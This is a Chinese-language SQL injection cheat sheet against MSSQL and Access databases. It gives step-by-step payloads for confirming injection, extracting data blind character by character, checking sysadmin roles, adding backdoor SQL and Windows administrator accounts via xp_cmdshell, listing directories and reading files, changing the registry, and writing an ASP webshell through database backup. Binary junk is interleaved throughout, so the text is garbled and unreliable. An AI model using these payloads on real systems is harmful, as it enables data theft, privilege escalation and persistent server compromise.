1.判断是否有注入;and 1=1 ;and 1=2 �aVM@^��n�
2.初步判断是否是mssql ;and user>0 ]Tx8ImD#)A
"
��F~uTo�
3.注入参数是字符'and [查询条件] and ''=' _�F;(#���D
H�}dsd�=yO
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Hh$x8AD��f
5m=3�{lBi
5.判断数据库系统 �VkRv�mKYl
9"�I/jd�0B
;and (select count(*) from sysobjects)>0 mssql CLdLO��u"
�e�s�L�PJx
;and (select count(*) from msysobjects)>0 access r*p��<�7��
��Tm.�(gK�
WG1U�v�P�K
z��Y�bSv~)
6.猜数据库 ;and (select Count(*) from [数据库名])>0 #T99p�+�O�
4 "@BbVY�R
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Y"K�7$+5#\
�*�h-�_
��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 l�J62[2=V�
9V0iV5?(�P
9.(1)猜字段的ascii值(access) y9=/kFPR�m
f�)({;,q��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �"F7g8vu�
�4[�"$}�O5
(2)猜字段的ascii值(mssql) ���xD8x1-�
;v[F@O~�*)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 2�(\~z@g��
Y(m/E.�h.~
10.测试权限结构(mssql) �VW�I|`O.w
6*�A
�S4l
c�}U&!R2p{
Q�x>S>��f
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- j�;=��+5PY
DQ?'f@I&*
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �|z<E%`u%�
�>/��.��-N
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- j��I_�T�N5
9mEC|(m*WK
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- G)?�VC^�Q�
�2~<�?E�`+
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �1,p7Sl^h
yxf�|Njo�0
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- |dsd�5V�dr
��D^E�1�
;and 1=(select IS_MEMBER('db_owner'));-- a<k�x��9�5
:��tu6'X\k
�r�azVO]]E
RC�sQLKqF�
11.添加mssql和系统的帐户 0V
u��G(O�
I�:�P/�
?-
;exec master.dbo.sp_addlogin username;-- 6�wYd)MDLL
;exec master.dbo.sp_password null,username,password;-- k�#_B^J&�d
��I8d#AVF2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- v�j�]�-p=�
Q��mT L�-�
;exec master.dbo.xp_cmdshell 'net user username password _8vq�]|�rC
��:EJ+���#
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- V:4]]z� L}
(|(#~o]40t
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ,]gYy00w0s
Vahfz8~w�/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��x�{`>Il�
�� )�`!i"
FX`SaY>D�
�Cu3�^de@h
12.(1)遍历目录 Bd*:y �qi�
8
���;y� N
;create table dirs(paths varchar(100), id int)
k_
9�gM�O
paF�$�o6\
;insert dirs exec master.dbo.xp_dirtree 'c:\' 7%)�
��F]
O~N�0J�K_>
;and (select top 1 paths from dirs)>0 y,� �@�I�6
sPuNwVX>}I
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �"a
%5on�
;N6E���uiz
'!>L�F�1W=
}SIUs�h�'�
(2)遍历目录 I&^�B��?"Y
�
3=@94i��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- *�^e06x�c:
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 H3"90^|,�@
^vPM\�qP#g
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Rw�J#G7S#�
&,/_"N"�?D
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 0\*�[7!`s�
M�}2a/}4��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 BO�)K=gl;8
~j�WG� U-m
�mc���v�d/
<\l@`x96"D
13.mssql中的存储过程 (!`TO{�!6P
\6~(#��y�
xp_regenumvalues 注册表根键, 子键 y��,�e#�e`
3��m:[�o`L
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 r!�A1Sfo4P
L6S!?t.{Yv
xp_regread 根键,子键,键值名 �:%�-x�i�v
C{�AVV<���
;exec xp_regread �X&R��,�-^
��(|H�1�zO
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �F�*Lm=^�:
Plpt7��Pa_
xp_regwrite 根键,子键, 值名, 值类型, 值 Ot��K=UtVI
Q���v��=F'
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 g*]�G�c�%
$K�D��H"J�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 MD`1�KC_�m
Bs7/<$9K/
xp_regdeletevalue 根键,子键,值名 ���6�bj.z
I�j�J�O;��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��!#�#OQ�
3zi(|B[�,?
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 p1^���k4G
rq=D[vX\N(
��5`]�;[M9
�?}<4L�K�]
14.mssql的backup创建webshell �8JYF0r�7�
W6cA@DN$#�
use model �=����^���
�s �az<NT
create table cmd(str image); �x%<oe�M3U
nSUQ Eh�o<
insert into cmd(str) values (''); �s'/b&Idf8
(vL-Z[�M!
backup database model to disk='c:\l.asp'; xB.h#x>�_`
L#)F�00�/`
#���Fp5>%*
�y�"5>O�|`
15.mssql内置函数 #|\w\MJamP
!8'mI��XZ$
;and (select @@version)>0 获得Windows的版本号 �)<��C�f,R
~�ti{na4W<
;and user_name()='dbo' 判断当前系统的连接用户是不是sa e6O�+h�C]:
��#9=as �Y
;and (select user_name())>0 爆当前系统的连接用户 �NFDh!�HUm
9/[1a�_
�r
;and (select db_name())>0 得到当前连接的数据库 l]�:nncpns
5��!�GL��"
T�4H/D^�X|
`|��9NxF�+
16.简洁的webshell =}SH*x�i�6
Na6z�1&�wS
use model �x+1Cs$E;�
Rw���u
y!F
create table cmd(str image); vR;?~^{*s�
AHa�%�?wb�
insert into cmd(str) values (''); �~96fyk�|�
�Z %?�:
CA
backup database model to disk='g:\wwwtest\l.asp';
